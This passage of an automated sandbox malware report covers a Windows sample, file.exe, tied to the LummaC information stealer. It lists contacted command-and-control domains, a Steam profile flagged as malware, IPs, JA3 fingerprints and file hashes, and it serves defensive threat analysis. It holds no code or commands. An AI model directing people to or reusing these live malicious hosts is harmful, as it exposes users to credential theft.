https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	unknown
sergei-esenin.com	104.21.53.8	true	true	unknown
eaglepawnoy.store	unknown	unknown	false	unknown
bathdoomgaz.store	unknown	unknown	false	unknown
spirittunek.store	unknown	unknown	false	unknown
licendfilteo.site	unknown	unknown	true	unknown
studennotediw.store	unknown	unknown	false	unknown
mobbipenju.store	unknown	unknown	false	unknown
clearancek.site	unknown	unknown	true	unknown
dissapoiznw.store	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
studennotediw.stor	true		unknown
spirittunek.stor	true		unknown
eaglepawnoy.stor	true		unknown
clearancek.site	true		unknown
mobbipenju.stor	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
licendfilteo.site	true		unknown
bathdoomgaz.stor	true		unknown
dissapoiznw.stor	true		unknown
https://sergei-esenin.com/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/my/wishlist/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/?subsection=broadcasts	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/	file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/stats/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com:443/api	file.exe, 00000003.00000002.1345090990.0000000000A87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/765611997243319001	file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States		13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528464
Start date and time:	2024-10-07 23:22:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:23:12	API Interceptor	2x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.8	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	CSY6k9gpVb.exe	Get hash	malicious	LummaC	Browse
	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	c3KH2gLNrM.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	8ObkdHP9Hq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse
	file.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.206.204
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	CSY6k9gpVb.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
steamcommunity.com	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	utmggBCMML.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	92.122.104.90
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	out.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.65.255.143
	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.206.204
	https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	188.114.96.3
	L-tron_Payroll.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==	Get hash	malicious	Unknown	Browse	104.16.231.132
AKAMAI-ASUS	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	utmggBCMML.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0	Get hash	malicious	Unknown	Browse	184.28.90.27
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	88.221.169.152
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	92.122.104.90
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu	Get hash	malicious	HTMLPhisher	Browse	2.19.126.151
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	utmggBCMML.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	lihZ6gUU7V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8 104.102.49.254
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8 104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8 104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	FdjDPFGTZS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8 104.102.49.254

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948057708971282
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'872'384 bytes
MD5:	92dd1108dbdebf3163c394deb38b0278
SHA1:	e3a3638739deffd8b817a53b73f71cafbae978f6
SHA256:	5a8fb0d6f8d170f4a1054b55fd5ce72e195810d130ef6e72ea76ea9441dbb996
SHA512:	76a2c227ebfde9bb7a5b552b3ce7b95354ab439559c687b406d0ef85256d8921dd8f76ba73a5f4e9c2dc2cf6db4ee1204b2c49af74c869e7409a7259e25b972d
SSDEEP:	49152:0mZrOsi5Xy6A90bRGnWnTSU7cPju7eBLruvdsbZU:0gCsgCradHSU75eBmvdkZU
